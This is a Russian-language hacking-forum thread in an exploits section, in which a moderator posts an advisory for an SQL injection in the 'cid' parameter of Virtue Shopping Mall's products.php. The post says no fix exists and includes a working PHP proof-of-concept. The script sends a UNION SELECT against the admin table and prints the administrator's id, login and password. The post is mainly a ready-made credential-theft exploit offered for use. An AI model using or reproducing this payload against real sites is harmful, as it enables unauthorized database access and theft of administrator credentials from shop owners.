18:50
Обновить
Virtue Shopping Mall - Форум
| RSS



[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 11
Модератор форума: aka_kludge, LeadyTOR 
Форум » взЛОм » Сплойты » Virtue Shopping Mall
Virtue Shopping Mall
LeadyTORДата: Пятница, 10.07.2009, 12:53 | Сообщение # 1
Подполковник
Группа: Модераторы
Сообщений: 64
Награды: 0
Репутация: 4
Статус: Offline
Из названия всё понятно

Прелесная и пушистая. Но если разозлить то берегитесь.
 
LeadyTORДата: Пятница, 10.07.2009, 12:54 | Сообщение # 2
Подполковник
Группа: Модераторы
Сообщений: 64
Награды: 0
Репутация: 4
Статус: Offline
Программа: Virtue Shopping Mall

Опасность: Средняя

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "cid" в сценарии products.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

URL производителя: virtuenetz.com/shopping_mall.php

Решение: Способов устранения уязвимости не существует в настоящее время.

Источники:

* Virtue Shopping Mall (cid) Remote SQL Injection PoC

Code
<?
$web  = $argv[1];
$url = $web."/products.php?cid=8+and+1=0+union+select+all+concat(0x756E646572,id,0x3A,login,0x3A,password,0x736563)+from+admin+limit+0,1";
preg_match_all("/under(.*)sec/",file_get_contents($url),$salida, PREG_PATTERN_ORDER);
$info = explode(":",$salida[1][0]);
echo "ID :".$info[0]."\n";
echo "Usuario : ".$info[1]."\n";
echo "Password : ".$info[2]."\n";
?>


Прелесная и пушистая. Но если разозлить то берегитесь.
 
Форум » взЛОм » Сплойты » Virtue Shopping Mall
Страница 1 из 11
Поиск:

Профиль
ИнформацияУправление
Сегодня: 19, 19.11.2017, 18:50
Вы используете: " v "
ВаШ внешний IP: "54.162.166.214"
У вас новых личных сообщений · Мой профиль | Выход




    Главная      
...
На службе : дней

18:50
Обновить


Пользователи
aka_kludge
qwerty
LeadyTOR
aka_Atlantis
AdHErENt
mAss
Sissutr
hiss
DrBio
tHick

Поиск

...



Друзья сайта

ГеоИнфоКом


Miranda Инфо

Метеориты

Остаться в живых - LOST. Лучший сайт сериала.

Метеориты

Hackersoft

hackings.ru

Схемы дл<a href=


Обмен cсылками
ITbuben - IT-шные блоги, сообщества, Windows, Linux, Web, Программирование, Интернет, Юмор, Софт


Copyright tHR - TeAM 2017 г. admin: aka_kludge (ICQ:334449009) Moderator's: LeadyTOR, HanaBi ... Яндекс.Метрика